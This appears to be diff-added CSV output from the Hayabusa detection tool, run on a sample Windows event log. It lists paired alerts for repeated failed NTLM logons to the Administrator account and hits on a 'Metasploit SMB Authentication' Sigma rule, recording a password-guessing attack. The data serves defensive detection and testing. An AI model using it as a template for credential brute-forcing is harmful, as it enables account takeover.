+2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H6RFTZVJE9remzqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pzjwzORvTwuBPLEs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UMjSFfZ88BV2sT1F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SnpCLI2EJZRhr3vz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ztEU2m9SwbqgSdVY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MHO1X0zwmoWotcM4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ck429g2Cs4siVVq4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9txH9zA3oY885iTi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: alIIEzE2rTrNtOtr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ww4BXLwhaNxOttgo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GPdz2pjDocMWqctT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QOm1i2a20IDNmIu4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ukSrSu516dHlHQ94  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: grdERCipFl1FMB1o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmpuUsIRbp57KCRD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VWLuqrOQSQuqcwUr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eEASOf84AX8ow4vf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IcgNTGlESh6FytEY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OeVo7D3oBsdUMHfj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mLqSB2yGMksaBgUS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y7qRzzpL2YhfIGSD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvE5tMw3MjDhA0Fe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aXuNgOkIzvKIuJki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q8vPHEXrxVpUyKZq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vk7sh6VM7AZQv2in  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jurt5hAg90y1VWdT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MlrPbTbJRTxFakiv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RQ5cWmYL8weCCRT0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k0v2Emgn7BD1STZl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MJppWxAiNJ4D0s2U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zHVcJEec3y6v9gIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 68RKE5dS8X5Px2gR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Np8mTqhr7QasXk1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhpDNDIPVyRlfej8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qZtmxGeLj25VSUcm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SPN8w8WghBYzChZc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 36hmbCuKxF9Dt4vR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TALpRirdvB9a8y6M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wvEvwFeXGOgycZvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ppxeOgZNua2Ieuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n4U5XdQu1YtSat7J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MN0OfYE6vPgqyyZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmfCPIdiTH9gG2qZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UtcHAxmfDL9C9uZa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TX62kMSJqq0Lv8o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
